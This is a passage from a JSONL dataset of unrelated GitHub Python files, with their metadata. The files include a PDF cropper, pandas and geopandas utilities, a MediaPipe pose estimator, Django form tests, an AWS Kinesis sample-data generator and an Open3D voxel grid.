_field_names_camel2snake[cls] = dc\n dc[camel_name] = snake_name\n\n_field_names_populate()\n\n\n\n\ndef main():\n dostuff()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"maxrunsoftware/jezel","sub_path":"database_object3.py","file_name":"database_object3.py","file_ext":"py","file_size_in_byte":28600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"12598501641","text":"import numpy\nfrom PyPDF2 import PdfFileReader, PdfFileWriter\n\ndef cropPageLeft(page):\n\twidth = page.mediaBox.lowerRight[0]\n\theight = page.mediaBox.upperLeft[1]\n\t\n\tpage.cropBox.lowerLeft = (0, height/2)\n\tpage.cropBox.lowerRight = (width, height/2)\n\tpage.cropBox.upperLeft = (0, height)\n\tpage.cropBox.upperRight = (width, height)\n\ndef cropPageRight(page):\n\twidth = page.mediaBox.lowerRight[0]\n\theight = page.mediaBox.upperLeft[1]\n\t\n\tpage.cropBox.lowerLeft = (0, 0)\n\tpage.cropBox.lowerRight = (width, 0)\n\tpage.cropBox.upperLeft = (0, height/2)\n\tpage.cropBox.upperRight = (width, 
height/2)\n\ndef splitPDF(pdf, pagesPerDocument):\n\treader1 = PdfFileReader(pdf)\n\treader2 = PdfFileReader(pdf)\n\tnumPages = reader1.getNumPages()\n\t\n\tif numPages % pagesPerDocument != 0:\n\t\traise Exception(f\"Number of pages not divisible by {pagesPerDocument}.\")\n\t\t\n\tnumDocs = numPages // pagesPerDocument\n\t\n\tpages1 = [reader1.getPage(i) for i in range(numPages)]\n\tpages2 = [reader2.getPage(i) for i in range(numPages)]\n\t\n\tarraysOfPages1 = numpy.array_split(pages1, numDocs)\n\tarraysOfPages2 = numpy.array_split(pages2, numDocs)\n\t\n\twriters = []\n\t\n\tfor i in range(numDocs):\n\t\twriter = PdfFileWriter()\n\t\t\n\t\tfor j in range(pagesPerDocument):\n\t\t\tcropPageLeft(arraysOfPages1[i][j])\n\t\t\tcropPageRight(arraysOfPages2[i][j])\n\t\t\t\n\t\t\tif j % 2 == 0:\n\t\t\t\twriter.insertPage(arraysOfPages1[i][j])\n\t\t\t\twriter.addPage(arraysOfPages2[i][j])\t\n\t\t\tif j % 2 == 1:\n\t\t\t\twriter.addPage(arraysOfPages1[i][j])\n\t\t\t\twriter.insertPage(arraysOfPages2[i][j])\t\n\t\n\t\twriters.append(writer)\n\t\n\treturn writers\n\npagesPerDocument = int(input(\"Enter number of pages per document: \"))\n\t\n\nwith open(\"PDF.pdf\", \"rb\") as input:\n\twriters = splitPDF(input, pagesPerDocument)\n\toutputWriter = PdfFileWriter()\n\t\n\tfor writer in writers:\n\t\tfor page in [writer.getPage(i) for i in range(writer.getNumPages())]:\n\t\t\toutputWriter.addPage(page)\n\t\t\t\n\t\t\n\twith open(\"output.pdf\", \"wb\") as output:\n\t\toutputWriter.write(output)\n\t\t\n\t\t\t\t\t\n","repo_name":"pdavisonreiber/PDFCropper","sub_path":"PDFCropper.py","file_name":"PDFCropper.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"74679239958","text":"import pandas as pd\r\nfrom numpy import sort\r\n\r\nfrom Process import get_number\r\n\r\n\r\nclass DataCube:\r\n def __init__(self, df, categories):\r\n self.df = df\r\n self.categories = categories\r\n self.options = []\r\n self.used_values = []\r\n\r\n def get_val_based_on_condition(self, dataset, option, value):\r\n cond = input('Enter one of these options =, /=, >, >=, <, <=')\r\n if cond == '=':\r\n return dataset.loc[self.df[option] == value]\r\n elif cond == '/=':\r\n return dataset.loc[self.df[option] != value]\r\n elif cond == '>':\r\n return dataset.loc[self.df[option] > value]\r\n elif cond == '>=':\r\n return dataset.loc[self.df[option] >= value]\r\n elif cond == '<':\r\n return dataset.loc[self.df[option] < value]\r\n elif cond == '<=':\r\n return dataset.loc[self.df[option] <= value]\r\n else:\r\n return self.get_val_based_on_condition(dataset, option, value)\r\n\r\n def get_games_on_option(self, dimension):\r\n num = input('Enter the number of values you want to use in your query. 
You may select multiple values of the '\r\n 'same option.')\r\n\r\n for i in range(get_number(num, int)):\r\n option = dimension.get_option()\r\n self.used_values.append(option)\r\n\r\n sort(self.used_values)\r\n count_vals = {}\r\n for i in self.used_values:\r\n if i not in count_vals:\r\n count_vals.update({i: 1})\r\n else:\r\n count_vals[i] += 1\r\n\r\n data = self.df[self.categories]\r\n for option in count_vals:\r\n datasets = []\r\n for i in range(count_vals[option]):\r\n op = Options(option, self.df)\r\n option_value = op.get_values_for_data()\r\n self.options.append(option_value)\r\n val = self.get_val_based_on_condition(data, option, option_value)\r\n datasets.append(val)\r\n data = pd.concat(datasets)\r\n\r\n dimensions = dimension.get_dimensions()\r\n print(data[dimensions].to_string(index=False))\r\n\r\n\r\nclass Options:\r\n def __init__(self, option, df):\r\n self.option = option\r\n self.df = df\r\n\r\n def get_values_for_data(self):\r\n option_value = input('Enter the value for ' + self.option + ' You would like to view.')\r\n if self.option in ['NA_Sales', 'EU_Sales', 'JP_Sales', 'Other_Sales', 'Global_Sales', 'Critic_Score',\r\n 'Critic_Count', 'User_Score', 'User_Count', 'Year_of_Release']:\r\n option_value = get_number(option_value)\r\n\r\n if type(option_value) != float:\r\n while option_value not in list(self.df[self.option]):\r\n option_value = input('Not a valid option, try again.')\r\n return option_value\r\n\r\n\r\nclass Dimension:\r\n def __init__(self, categories):\r\n self.categories = categories\r\n\r\n def get_dimensions(self):\r\n num = input('How many variables from the dataset would you like to use?')\r\n dimensions = []\r\n for i in range(get_number(num, int)):\r\n dimension = self.get_option('What dimension would you like to view')\r\n if dimension not in dimensions:\r\n dimensions.append(dimension)\r\n else:\r\n print('dimension', dimension, 'already in the list.')\r\n i -= 1\r\n return dimensions\r\n\r\n def get_option(self, value='What option of games would you like to get your data based on?'):\r\n option = input(value)\r\n while option not in self.categories:\r\n option = input('Not a valid option, try again.')\r\n return option\r\n","repo_name":"thatgirlprogrammer/Video_Game_Stats","sub_path":"data_Cube.py","file_name":"data_Cube.py","file_ext":"py","file_size_in_byte":3725,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"37149703925","text":"# -*- coding: utf-8 -*-\nfrom scrapy.exceptions import DropItem\n\nsign_table = {\n u'白羊座': '火象',\n u'狮子座': '火象',\n u'射手座': '火象',\n u'水瓶座': '风象',\n u'双子座': '风象',\n u'天秤座': '风象',\n u'金牛座': '土象',\n u'处女座': '土象',\n u'摩羯座': '土象',\n u'巨蟹座': '水象',\n u'天蝎座': '水象',\n u'双鱼座': '水象',\n}\n\n\nclass HoroscopeSignPipeline(object):\n def process_item(self, item, spider):\n if not item['horoscope']:\n raise DropItem('no horoscope')\n elif item['horoscope'] in sign_table:\n item['sign'] = sign_table[item['horoscope']]\n else:\n raise DropItem('invalid horoscope ' + item['horoscope'])\n return item\n","repo_name":"genzj/web-crawler-training-exercise","sub_path":"example/ex2-crawler-engineering/topmusic/topmusic/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"85"} +{"seq_id":"3985837089","text":"\"\"\"This file is responsible for the creation and display of the heatmap for the given factor\"\"\"\nfrom typing import Any\n\nimport geopandas as 
gpd\nimport matplotlib.pyplot as plt\nimport python_ta\n\n\n# Creation of Map\ndef map_creation(indexes: dict, factor: str) -> Any:\n \"\"\"Accepts a dictionary containing the province codes as keys and their factor indexes as the values. The values\n in the dictionary is appended to the geodataframe obtained from a geojson file which contains the data to create the\n map for all provinces in Canada which is then used to create the heatmap.\n \"\"\"\n canada = gpd.GeoDataFrame.from_file(\"georef-canada-province@public.geojson\")\n\n # Order: AB, YT, MB, SK, NT, PE, NS, ON, QC, NU, BC, NL, NB\n # Province Indexes are appended\n for index in indexes:\n if indexes[index] is None:\n indexes[index] = 0\n canada['indexes'] = [indexes['AB'], indexes['YT'], indexes['MB'], indexes['SK'], indexes['NT'], indexes['PE'],\n indexes['NS'], indexes['ON'], indexes['QC'], indexes['NU'], indexes['BC'], indexes['NL'],\n indexes['NB']]\n\n # # # # Complex mapping\n canada.plot(column='indexes', cmap='OrRd',\n legend=True, figsize=(10, 8))\n plt.title(\"Heatmap for \" + factor + \" cost (in CAD)\")\n plt.show()\n\n return canada\n\n\nif __name__ == '__main__':\n python_ta.check_all(config={\n 'max-line-length': 120,\n 'max-nested-blocks': 4,\n 'extra-imports': ['geopandas', 'matplotlib.pyplot', 'graph', 'classes'],\n })\n","repo_name":"raghav034/analysing-cities","sub_path":"analysing-cities/map_creation.py","file_name":"map_creation.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"36205895907","text":"import numpy as np\nfrom torchvision import transforms, datasets\nfrom torch.utils.data import DataLoader\nfrom PIL import Image\n\n\ndef transform_image():\n \"\"\"Returns transform object of train/valid/test datasets.\"\"\"\n image_transforms = {\n 'train':\n transforms.Compose([\n # use data augmentation on training sets\n transforms.RandomResizedCrop(224),\n transforms.RandomRotation(degrees=30),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225]) # Imagenet standards\n ]),\n # no augmentation on validation and test sets\n 'valid':\n transforms.Compose([\n transforms.Resize(size=256),\n transforms.CenterCrop(size=224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])\n ]),\n 'test':\n transforms.Compose([\n transforms.Resize(size=256),\n transforms.CenterCrop(size=224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])\n ]),\n }\n return image_transforms\n\n\ndef get_dataloaders(data_dir):\n \"\"\"Return data and dataloader based on data directory\n\n Args: string value that refers file directory\n\n Returns:\n data: train/valid/test datasets dictionary\n dataloaders: train/valid/test dataloader dictionary\n \"\"\"\n train_dir = data_dir + '/train'\n valid_dir = data_dir + '/valid'\n test_dir = data_dir + '/test'\n # Image transformations\n image_transforms = transform_image()\n data = {\n 'train':\n datasets.ImageFolder(root=train_dir,\n transform=image_transforms['train']),\n 'valid':\n datasets.ImageFolder(root=valid_dir,\n transform=image_transforms['valid']),\n 'test':\n datasets.ImageFolder(root=test_dir,\n transform=image_transforms['test']),\n }\n dataloaders = {\n 'train': DataLoader(data['train'], batch_size=32, shuffle=True),\n 'val': DataLoader(data['valid'], batch_size=32),\n 'test': DataLoader(data['test'], 
batch_size=32)\n }\n return data, dataloaders\n\n\ndef process_image(image):\n \"\"\"Scales, crops, and normalizes a PIL image for a PyTorch model,\n\n returns an Numpy array\n \"\"\"\n img_size = 256\n crop_size = 224\n\n im = Image.open(image)\n im = im.resize((img_size,img_size))\n\n left = (img_size-crop_size)*0.5\n right = left + crop_size\n upper = (img_size-crop_size)*0.5\n lower = upper + crop_size\n\n im = im.crop((left, upper, right, lower))\n im = np.array(im)/255\n\n mean = np.array([0.485, 0.456, 0.406])\n std = np.array([0.229, 0.224, 0.225])\n im = (im - mean) / std\n return im.transpose(2,0,1)\n","repo_name":"kimcrab/udacity-project","sub_path":"image-classifier-project/python-files/data_processor.py","file_name":"data_processor.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"74574435796","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 3 14:01:39 2016\n\n@author: arlittr\n\"\"\"\n\nimport networkx as nx\n\ndef plotPgvGraph(G,filename=None,printRelationships='relationship',promoteNodeLabels='rtype',printOldNodeLabels=False):\n G2 = G.copy()\n \n #print relationships on edges\n if printRelationships:\n for n,nbrs in G2.adjacency_iter():\n for nbr in nbrs.keys():\n for edgeKey,edgeProperties in G2[n][nbr].items():\n G2[n][nbr][edgeKey]['label'] = edgeProperties[printRelationships]\n \n #promote the attribute in promoteNodeLabels to node label\n if promoteNodeLabels:\n for n in G2.nodes_iter():\n try:\n G2.node[n]['label'] = G2.node[n][promoteNodeLabels]\n except:\n G2.node[n]['label'] = None\n \n #draw graph\n thisG = nx.drawing.nx_pydot.to_pydot(G2)\n if filename==None:\n filename = 'plots/'+ 'junk' + '.svg'\n thisG.write(filename,format='svg')\n ","repo_name":"DesignEngrLab/IBFM","sub_path":"ibfm_utility/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"243140483","text":"import numpy as np\n\n# 기본 데이터\nlist = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\narr1 = np.array(list)\narr2 = np.array(list)\n\n# 넘파이 기본 제공 연산자 사용\nprint(arr1 + arr2)\n\n# 모든 원소들을 직접 더하는 연산 수행 로직\n\narr3 = []\n\nfor i, j in zip(arr1, arr2):\n arr3.append(i + j)\n\nprint(arr3)","repo_name":"ezidayzi/2022-01-lecture","sub_path":"OpenCV/ch03/14.deep.py","file_name":"14.deep.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"31587733497","text":"import argparse\nimport json\nimport random\nimport signal\nimport string\nimport sys\nimport time\nfrom collections import namedtuple\nimport distutils\n\nimport boto3\nimport numpy as np\n\nregions = {\n 'us_east_1': dict(cells_per_region=15, silos_per_cell=3),\n 'us-east-2': dict(cells_per_region=2, silos_per_cell=2),\n 'us-west-1': dict(cells_per_region=6, silos_per_cell=2),\n 'us-west-2': dict(cells_per_region=2, silos_per_cell=2),\n 'eu-west-1': dict(cells_per_region=10, silos_per_cell=2),\n 'ap-northeast-1': dict(cells_per_region=5, silos_per_cell=3),\n}\n\nmicroserviceApollo = 'apollo'\nmicroserviceAthena = 'athena'\nmicroserviceDemeter = 'demeter'\nmicroserviceHercules = 'hercules'\nmicroserviceZeus = 'zeus'\nmicroservices = [microserviceApollo, microserviceAthena, microserviceDemeter, microserviceHercules, microserviceZeus]\n\ninstance_r5_4xl = 'r5.4xlarge'\ninstance_m5_8xl = 'm5.8xlarge'\ninstance_c5_16xl = 
'c5.16xlarge'\ninstance_m5_4xl = 'm5.4xlarge'\n\ninstanceTypes = {\n microserviceApollo: instance_r5_4xl,\n microserviceAthena: instance_m5_8xl,\n microserviceDemeter: instance_c5_16xl,\n microserviceHercules: instance_r5_4xl,\n microserviceZeus: instance_m5_4xl\n}\n\nosAl2 = 'AL2'\nosAl2012 = 'AL2012'\n\nosVersions = {\n microserviceApollo: osAl2,\n microserviceAthena: osAl2012,\n microserviceDemeter: osAl2012,\n microserviceHercules: osAl2012,\n microserviceZeus: osAl2\n}\n\ninstancesForMicroservice = {\n microserviceApollo: 3,\n microserviceAthena: 1,\n microserviceDemeter: 1,\n microserviceHercules: 2,\n microserviceZeus: 3\n}\n\nprocessHostmanager = 'host_manager'\nprocessServer = 'server'\n\nprocessNames = {\n microserviceApollo: [processServer],\n microserviceAthena: [processServer, processHostmanager],\n microserviceDemeter: [processServer, processHostmanager],\n microserviceHercules: [processServer],\n microserviceZeus: [processServer]\n}\n\njdk8 = 'JDK_8'\njdk11 = 'JDK_11'\n\njdkVersions = {\n microserviceApollo: jdk11,\n microserviceAthena: jdk8,\n microserviceDemeter: jdk8,\n microserviceHercules: jdk8,\n microserviceZeus: jdk11\n}\n\nmeasureCpuUser = 'cpu_user'\nmeasureCpuSystem = 'cpu_system'\nmeasureCpuIdle = 'cpu_idle'\nmeasureCpuIowait = 'cpu_iowait'\nmeasureCpuSteal = 'cpu_steal'\nmeasureCpuNice = 'cpu_nice'\nmeasureCpuSi = 'cpu_si'\nmeasureCpuHi = 'cpu_hi'\nmeasureMemoryFree = 'memory_free'\nmeasureMemoryUsed = 'memory_used'\nmeasureMemoryCached = 'memory_cached'\nmeasureDiskIoReads = 'disk_io_reads'\nmeausreDiskIoWrites = 'disk_io_writes'\nmeasureLatencyPerRead = 'latency_per_read'\nmeasureLatencyPerWrite = 'latency_per_write'\nmeasureNetworkBytesIn = 'network_bytes_in'\nmeasureNetworkBytesOut = 'network_bytes_out'\nmeasureDiskUsed = 'disk_used'\nmeasureDiskFree = 'disk_free'\nmeasureFileDescriptors = 'file_descriptors_in_use'\n\nmeasureTaskCompleted = 'task_completed'\nmeasureTaskEndState = 'task_end_state'\nmeasureGcReclaimed = 'gc_reclaimed'\nmeasureGcPause = 'gc_pause'\n\nmeasuresForMetrics = [measureCpuUser, measureCpuSystem, measureCpuIdle, measureCpuIowait,\n measureCpuSteal, measureCpuNice, measureCpuSi, measureCpuHi,\n measureMemoryFree, measureMemoryUsed, measureMemoryCached, measureDiskIoReads,\n meausreDiskIoWrites, measureLatencyPerRead, measureLatencyPerWrite, measureNetworkBytesIn,\n measureNetworkBytesOut, measureDiskUsed, measureDiskFree, measureFileDescriptors]\n\nmeasuresForEvents = [measureTaskCompleted, measureTaskEndState, measureGcReclaimed, measureGcPause, measureMemoryFree]\n\nmeasureValuesForTaskEndState = ['SUCCESS_WITH_NO_RESULT', 'SUCCESS_WITH_RESULT', 'INTERNAL_ERROR', 'USER_ERROR',\n 'UNKNOWN', 'THROTTLED']\nselectionProbabilities = [0.2, 0.7, 0.01, 0.07, 0.01, 0.01]\n\nDimensionsMetric = namedtuple('DimensionsMetric',\n 'region cell silo availability_zone microservice_name instance_type os_version instance_name')\nDimensionsEvent = namedtuple('DimensionsEvent',\n 'region cell silo availability_zone microservice_name instance_name process_name, jdk_version')\n\n\nutilizationRand = random.Random(12345)\nlowUtilizationHosts = []\nhighUtilizationHosts = []\n\nclass MeasureValue:\n def __init__(self, name, value, type):\n self.name = name\n if type == 'DOUBLE':\n self.value = round(value, 2)\n else:\n self.value = value\n self.type = type\n\n\ndef generateRandomAlphaNumericString(length=5):\n rand = random.Random(12345)\n x = ''.join(rand.choices(string.ascii_letters + string.digits, k=length))\n print(x)\n return x\n\n\ndef 
generateDimensions(scaleFactor):\n instancePrefix = generateRandomAlphaNumericString(8)\n dimensionsMetrics = list()\n dimenstionsEvents = list()\n\n for region_name, region_data in regions.items():\n cellsForRegion = region_data['cells_per_region']\n siloForRegion = region_data['silos_per_cell']\n for cell in range(1, cellsForRegion + 1):\n for silo in range(1, siloForRegion + 1):\n for microservice in microservices:\n cellName = '{}-cell-{}'.format(region_name, cell)\n siloName = '{}-cell-{}-silo-{}'.format(region_name, cell, silo)\n numInstances = scaleFactor * instancesForMicroservice[microservice]\n for instance in range(numInstances):\n az = '{}-{}'.format(region_name, (instance % 3) + 1)\n instanceName = 'i-{}-{}-{:04}.amazonaws.com'.format(instancePrefix, microservice, instance)\n instanceType = instanceTypes[microservice]\n osVersion = osVersions[microservice]\n metric = DimensionsMetric(region_name, cellName, siloName, az, microservice, instanceType, osVersion,\n instanceName)\n dimensionsMetrics.append(metric)\n\n jdkVersion = jdkVersions[microservice]\n for process in processNames[microservice]:\n event = DimensionsEvent(region_name, cellName, siloName, az, microservice, instanceName, process,\n jdkVersion)\n dimenstionsEvents.append(event)\n\n return (dimensionsMetrics, dimenstionsEvents)\n\ndef createRandomMetrics(host_id, timestamp, time_unit, dimensions):\n measure_values = list()\n\n ## CPU measures\n if host_id in highUtilizationHosts:\n cpu_user = 85.0 + 10.0 * random.random()\n elif host_id in lowUtilizationHosts:\n cpu_user = 10.0 * random.random()\n else:\n cpu_user = 35.0 + 30.0 * random.random()\n\n measure_values.append(MeasureValue(measureCpuUser, cpu_user, 'DOUBLE'))\n\n otherCpuMeasures = [measureCpuSystem, measureCpuSteal, measureCpuIowait, measureCpuNice, measureCpuHi, measureCpuSi]\n totalOtherUsage = 0.0\n\n for measure in otherCpuMeasures:\n value = random.random()\n totalOtherUsage += value\n measure_values.append(MeasureValue(measure, value, 'DOUBLE'))\n\n cpuIdle = 100 - cpu_user - totalOtherUsage\n measure_values.append(MeasureValue(measureCpuIdle, round(cpuIdle, 2), 'DOUBLE'))\n\n remainingMeasures = [measureMemoryFree, measureMemoryUsed, measureMemoryCached, measureDiskIoReads,\n meausreDiskIoWrites, measureLatencyPerRead, measureLatencyPerWrite, measureNetworkBytesIn,\n measureNetworkBytesOut, measureDiskUsed, measureDiskFree, measureFileDescriptors]\n\n for measure in remainingMeasures:\n value = 100.0 * random.random()\n measure_values.append(MeasureValue(measure, value, 'DOUBLE'))\n\n return [create_record('metrics', measure_values, timestamp, dimensions)]\n\n\ndef createRandomEvent(timestamp, time_unit, dimensions):\n taskCompletion = MeasureValue(measureTaskCompleted, random.randint(0, 500), 'BIGINT')\n taskEndState = MeasureValue(measureTaskEndState, np.random.choice(measureValuesForTaskEndState, p=selectionProbabilities), 'VARCHAR')\n measure_values = [taskCompletion, taskEndState]\n\n remainingMeasures = [measureGcReclaimed, measureGcPause, measureMemoryFree]\n\n for measure in remainingMeasures:\n value = 100.0 * random.random()\n measure_values.append(MeasureValue(measure, value, 'DOUBLE'))\n\n return [create_record('events', measure_values, timestamp, dimensions)]\n\n\ndef create_record(object_type, measure_values, timestamp, dimensions):\n record = dict(dimensions)\n for mv in measure_values:\n record[mv.name] = mv.value\n record['time'] = timestamp\n record['@type'] = object_type\n return record\n\n\ndef 
send_records_to_kinesis(all_dimensions, kinesis_client, stream_name, sleep_time, percent_late, late_time):\n while True:\n if percent_late > 0:\n value = random.random()*100\n if (value >= percent_late):\n print('Generating On-Time Records.')\n local_timestamp = int(time.time())\n else:\n print('Generating Late Records.')\n local_timestamp = (int(time.time()) - late_time)\n else:\n local_timestamp = int(time.time())\n\n for series_id, dimensions in enumerate(all_dimensions):\n dimension_dict = dimensions._asdict()\n if isinstance(dimensions, DimensionsMetric):\n metrics = createRandomMetrics(series_id, local_timestamp, 'SECONDS', dimension_dict)\n else:\n metrics = createRandomEvent(local_timestamp, 'SECONDS', dimension_dict)\n\n records = []\n for metric in metrics:\n print(metric)\n data = json.dumps(metric)\n records.append({'Data': bytes(data, 'utf-8'), 'PartitionKey': dimension_dict['instance_name']})\n\n kinesis_client.put_records(StreamName=stream_name, Records=records)\n\n print('Wrote {} record to Kinesis Stream \\'{}\\''.format(\n 'event' if not isinstance(dimensions, DimensionsMetric) else 'metric', stream_name))\n \n if sleep_time > 0:\n time.sleep(float(sleep_time)) \n\ndef main(args):\n global utilizationRand\n global lowUtilizationHosts\n global highUtilizationHosts\n\n print(args)\n generate_events = args.generate_events\n generate_metrics = args.generate_metrics\n\n if not generate_events and not generate_metrics:\n print('Exiting: generate_events and generate_metrics are both false, so no data will be generated')\n sys.exit(0)\n\n host_scale = args.hostScale # scale factor for the hosts.\n\n dimensions_measures, dimensions_events = generateDimensions(host_scale)\n\n if generate_metrics:\n print('Dimensions for metrics: {}'.format(len(dimensions_measures)))\n if generate_events:\n print('Dimensions for events: {}'.format(len(dimensions_events)))\n\n host_ids = list(range(len(dimensions_measures)))\n utilizationRand.shuffle(host_ids)\n lowUtilizationHosts = frozenset(host_ids[0:int(0.2 * len(host_ids))])\n highUtilizationHosts = frozenset(host_ids[-int(0.2 * len(host_ids)):])\n\n def signal_handler(sig, frame):\n print('Exiting Application')\n sys.exit(0)\n\n signal.signal(signal.SIGINT, signal_handler)\n stream_name = args.stream\n region_name = args.region\n kinesis_client = boto3.client('kinesis', region_name=region_name)\n\n sleep_time = args.sleep_time\n percent_late = args.percent_late\n late_time = args.late_time\n\n try:\n kinesis_client.describe_stream(StreamName=stream_name)\n except:\n print('Unable to describe Kinesis Stream \\'{}\\' in region {}'.format(stream_name, region_name))\n sys.exit(0)\n\n dimensions = dimensions_measures if generate_metrics else []\n dimensions += dimensions_events if generate_events else []\n send_records_to_kinesis(dimensions,\n kinesis_client, stream_name, sleep_time, percent_late, late_time)\n\ndef str2bool(v):\n if isinstance(v, bool):\n return v\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n if v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n\n raise argparse.ArgumentTypeError('Boolean value expected.')\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(prog='timestream_kinesis_data_gen',\n description='DevOps Sample Data Generator for Timestream/KDA Sample Application.')\n\n parser.add_argument('--stream', action='store', type=str, default='TimestreamTestStream',\n help='The name of Kinesis Stream.')\n parser.add_argument('--region', '-e', action='store', choices=['us-east-1', 
'us-east-2', 'us-west-2', 'eu-west-1'],\n default='us-east-1', help='Specify the region of the Kinesis Stream.')\n parser.add_argument('--host-scale', dest='hostScale', action='store', type=int, default=1,\n help='The scale factor determines the number of hosts emitting events and metrics.')\n parser.add_argument('--profile', action='store', type=str, default=None, help='The AWS Config profile to use.')\n\n # Optional sleep timer to slow down data\n parser.add_argument('--sleep-time', action='store', type=int, default=0,\n help='The amount of time in seconds to sleep between sending batches.')\n\n # Optional 'Late' arriving data parameters\n parser.add_argument('--percent-late', action='store', type=float, default=0,\n help='The percentage of data written that is late arriving ')\n parser.add_argument('--late-time', action='store', type=int, default=0,\n help='The amount of time in seconds late that the data arrives')\n\n # Optional type of data to generate\n parser.add_argument('--generate-events', action='store', type=str2bool, default=True,\n help='Whether to generate events')\n parser.add_argument('--generate-metrics', action='store', type=str2bool, default=True,\n help='Whether to generate metrics')\n\n main(parser.parse_args())\n","repo_name":"awslabs/amazon-timestream-tools","sub_path":"integrations/flink_connector/sample-data-generator/kinesis_data_gen.py","file_name":"kinesis_data_gen.py","file_ext":"py","file_size_in_byte":14223,"program_lang":"python","lang":"en","doc_type":"code","stars":223,"dataset":"github-code","pt":"85"} +{"seq_id":"20523881693","text":"import numpy as np\nimport open3d as o3d\n\nclass TimeSeriesVoxelGrid:\n def __init__(self, width, height, depth, num_steps, voxel_size=1.0):\n self.width = width\n self.height = height\n self.depth = depth\n self.num_steps = num_steps\n self.voxel_size = voxel_size\n self.grid = np.zeros((width, height, depth, num_steps), dtype=bool)\n\n def set_voxel(self, x, y, z, step):\n self.grid[x, y, z, step] = True\n\n def clear_voxel(self, x, y, z, step):\n self.grid[x, y, z, step] = False\n\n def is_voxel_set(self, x, y, z, step):\n return self.grid[x, y, z, step]\n\n def visualize(self, step):\n points = []\n for x in range(self.width):\n for y in range(self.height):\n for z in range(self.depth):\n if self.is_voxel_set(x, y, z, step):\n voxel_center = np.array([x, y, z]) * self.voxel_size\n points.append(voxel_center)\n if len(points) > 0:\n pcd = o3d.geometry.PointCloud()\n pcd.points = o3d.utility.Vector3dVector(np.array(points))\n o3d.visualization.draw_geometries([pcd])\n\n# Example usage\ngrid = TimeSeriesVoxelGrid(10, 10, 10, 5)\ngrid.set_voxel(5, 5, 5, 2)\ngrid.visualize(2)","repo_name":"virgantara/3D-Point-Cloud","sub_path":"VoxelGridTimeseries.py","file_name":"VoxelGridTimeseries.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"12761582720","text":"import cv2\nimport time\nimport mediapipe as mp\n\n\ncap = cv2.VideoCapture('Sample/pexels.mp4')\n\np_time = 0\nc_time = 0\n\nmpPose = mp.solutions.pose\npose = mpPose.Pose()\n\nmDraw = mp.solutions.drawing_utils\n\nwhile True:\n success, img = cap.read()\n\n img_RGB = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n\n result = pose.process(img_RGB)\n\n if result.pose_landmarks:\n mDraw.draw_landmarks(img, result.pose_landmarks, mpPose.POSE_CONNECTIONS)\n for id, lm in enumerate(result.pose_landmarks.landmark):\n h, w, c = img.shape\n cx, cy = int(lm.x*w), int(lm.y*h)\n\n 
cv2.circle(img, (cx, cy), 10, (255,0,0), cv2.FILLED)\n\n c_time = time.time()\n fps = 1 / (c_time - p_time)\n p_time = c_time\n\n # Adding FPS Text to the Video\n cv2.putText(img, str(int(fps)), (10, 70), cv2.FONT_HERSHEY_SIMPLEX, 3, (255, 0, 255), 3)\n\n cv2.imshow(\"Image\", img)\n\n cv2.waitKey(1)","repo_name":"Mayank187/poseEstimation","sub_path":"poseEstimation.py","file_name":"poseEstimation.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"19834453685","text":"from django.test import TestCase\nfrom .models import DrinkOrder\nfrom .forms import DrinkOrderForm\n\n\nclass TestForms(TestCase):\n def test_drink_order_form_modal(self):\n model = DrinkOrder\n self.assertIs(model, DrinkOrder)\n\n def test_drink_order_form_field(self):\n fields = (\"full_name\", \"email\", \"phone_number\",\n \"street_address1\", \"street_address2\", \"postcode\",\n \"country\",)\n self.assertTrue(fields, tuple)\n\n def test_placeholders(self):\n placeholders = {\n \"full_name\": \"Full Name\",\n \"email\": \"Email\",\n \"phone_number\": \"Phone Number\",\n \"street_address1\": \"Street Address 1\",\n \"street_address2\": \"Street Address 2\",\n \"postcode\": \"Postal Code\",\n }\n self.assertTrue(placeholders, dict)\n\n def test_input_fields(self):\n self.assertTrue(\"country\", str)\n\n def test_payment_form_full_name_is_required(self):\n form = DrinkOrderForm({\"full_name\": \"\"})\n self.assertFalse(form.is_valid())\n self.assertIn(\"full_name\", form.errors.keys())\n self.assertEqual(form.errors[\"full_name\"]\n [0], \"This field is required.\")\n\n def test_payment_form_email_is_required(self):\n form = DrinkOrderForm({\"email\": \"\"})\n self.assertFalse(form.is_valid())\n self.assertIn(\"email\", form.errors.keys())\n self.assertEqual(form.errors[\"email\"][0], \"This field is required.\")\n\n def test_payment_form_phone_number_is_required(self):\n form = DrinkOrderForm({\"phone_number\": \"\"})\n self.assertFalse(form.is_valid())\n self.assertIn(\"phone_number\", form.errors.keys())\n 